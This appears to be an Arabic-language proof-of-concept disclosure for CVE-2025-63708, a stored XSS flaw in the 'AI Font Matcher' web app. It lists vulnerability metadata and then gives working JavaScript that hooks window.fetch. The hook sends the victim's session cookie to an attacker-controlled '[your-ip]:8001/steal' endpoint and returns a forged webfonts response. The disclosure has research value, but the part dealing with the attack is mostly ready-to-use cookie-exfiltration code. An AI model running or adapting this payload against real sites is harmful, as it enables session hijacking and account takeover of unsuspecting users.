
استغلال إثبات المفهوم لـ CVE-2025-63708، وهي ثغرة XSS مخزنة في AI Font Matcher. يوضح سرقة ملفات تعريف الارتباط للجلسة عبر أسماء عائلات خطوط غير معقمة في استجابات جلب خطوط الويب.
معرّف CVE: CVE-2025-63708
تاريخ الإسناد: 11-12-2025
نوع المشكلة: CWE-79 (Cross-Site Scripting)
المنتج المتأثر: “AI Font Matcher” (نُشر في 2025-10-10، nid=18425)
صفحة المنتج: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
تاريخ الاكتشاف: 2025-10-11
الباحث: Dylan Davis
يعالج التطبيق البيانات القادمة من طلب webfonts دون تعقيم أسماء عائلات الخطوط. يمكن للمهاجم الذي يتحكم في هذه الاستجابة أو يعترضها حقن JavaScript يتم تنفيذها في سياق الصفحة، مما يتيح سرقة ملفات تعريف الارتباط الخاصة بالجلسة والاستيلاء على الحساب.
يوضح هذا الـ PoC تنفيذ التعليمات البرمجية عن طريق اعتراض window.fetch وإرجاع حمولة Web Fonts خاضعة للتحكم.
poc.js).webfonts؛ ولاحظ ظهور alert(1).window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
const url = (typeof input === 'string') ? input : input?.url;
if (url && url.includes('webfonts')) {
// Exfiltrate cookie to your server
fetch('http://[your-ip]:8001/steal?cookie=' +
encodeURIComponent(document.cookie))
.catch(e => console.log('Exfil failed:', e));
return new Response(JSON.stringify({
kind: "webfonts#webfontList",
items: [{ family: "Playfair Display", category: "serif" }]
}), {
status: 200,
headers: {'Content-Type': 'application/json'}
});
}
return window.__origFetch.apply(this, arguments);
};